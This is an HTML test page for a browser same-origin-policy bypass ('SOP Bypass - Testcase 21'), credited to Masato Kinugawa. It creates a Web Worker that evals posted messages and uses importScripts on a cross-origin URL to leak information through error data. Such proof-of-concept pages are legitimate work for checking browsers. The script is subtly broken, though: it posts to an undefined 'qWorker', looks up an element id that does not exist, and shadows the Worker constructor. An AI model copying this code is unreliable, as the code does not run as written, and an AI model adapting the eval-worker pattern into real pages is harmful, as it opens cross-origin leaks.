<html>
	<head>
		<title>Universal XSS (UXSS) SOP Bypass Vulnerability test</title>
		<style type="text/css">
			*{margin:0;padding:0;}
			.wrapper {
				width: 95%;
				background-color: #16a085;
				margin: 0 auto;
				font-family: times new roman;
				height: 88%;
			}
			.line {
				background-color: #ecf0f1;
				text-align: center;
				padding: 10px;
				color: #16a085;;
			}
			.main {
				color: #fff;
				padding: 10px;
			}
			.test {
				width: 200px;
				height: 40px;
				background-color: #fff;
				border: none;
				border-radius: 100px;	
				color: #16a085;
				font-size: 1.6em;
				margin: 0 auto;
			}
			.note {
				background: #1abc9c;
				color: #fff;
				padding: 10px;
				width: 95%;
				margin: 0 auto;
				margin-top: 40px;
			}
		</style>
	</head>
<body>



	<div class="wrapper">
			<img src="and.png">
	
			<h3 class="line">SOP Bypass - Testcase 21</h3>	

		<div class="main">
				<p>This test case is based upon importscripts() function in WebWorkers (Originally Found By Masato Kinugawa)</p>
		</div>
<script> 

function myfunction(){
		window.onload=()=>{
					var workerText='onerror=function(q){console.log("err"+q);};onmessage=function(q){console.log("Will eval:"+q.data);eval(q.data)};';
					
					var Worker=new Worker(URL.createObjectURL(new Blob([workerText])));
					Worker.onmessage=(q)=>{alert(q.data);};
					document.getElementById('test').onmousedown=()=>{
						qWorker.postMessage("try{importScripts('http://www.bing.com')}catch(e){this.postMessage(e.fileName)}");
						};
				};

}

</script>
		
		<center>	<input type="button" id="btn_test" class="test" value="Run Test Case" onclick="myfunction()" /></center>

		


 
 

		</br></br>
			<div class="note">
		
				<p><strong>Note:</strong> <br>
					Upon running the testcase, if the page alerts "bing.com, your browser is vulnerable to SOP Bypass
					
				</p>
			</div>
	</div>


</body>
</html>